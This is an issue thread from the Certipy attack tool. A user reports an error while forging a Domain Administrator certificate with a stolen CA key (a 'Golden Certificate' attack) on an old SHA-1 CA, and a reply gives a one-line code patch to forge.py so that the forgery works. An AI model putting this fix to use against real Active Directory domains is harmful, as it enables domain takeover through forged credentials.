Golden Certificate - Unsupported Algorithm - SHA1

[secu77]

Hello,

I have been trying to exploit the attack known as “Golden Certificate” using Certipy and have experienced some errors specific to this scenario. The CA is located on a fairly old Windows machine (I think it is Windows Server 2003 if I am not mistaken). The first step, the backup of the CA's private key and certificate, is successful. However, when I try to forge a certificate for a user (in this case, the Domain Administrator), an error occurs related to the creation of the certificate. Apparently SHA-1 is used, and I believe that this algorithm is completely deprecated and that is where the failure is.

I do not know much about certificates, so I do not know very well if you can implement an end to generate certificates using this algorithm, or you can edit the PFX of the CA, or something. It is a very particular scenario, I had never encountered a CA in such an old computer, so I report this bug so that if someone has the same thing, have a place to give more detail.

Greetings and thank you very much for the fantastic tool. Hopefully this can be solved.

[iDigitalFlame]

Hello!

I'm not a maintainer or anything for this project, but I had the same error as you do and I figured out how to fix it.

You need to manually edit the certipy/commands/forge.py file and edit line 231

Originally it's

cert = cert.sign(ca_key, signature_hash_algorithm())

Change it to

from cryptography.hazmat.primitives.hashes import SHA256
cert = cert.sign(ca_key, SHA256())

Once that's done, it should work fine for you!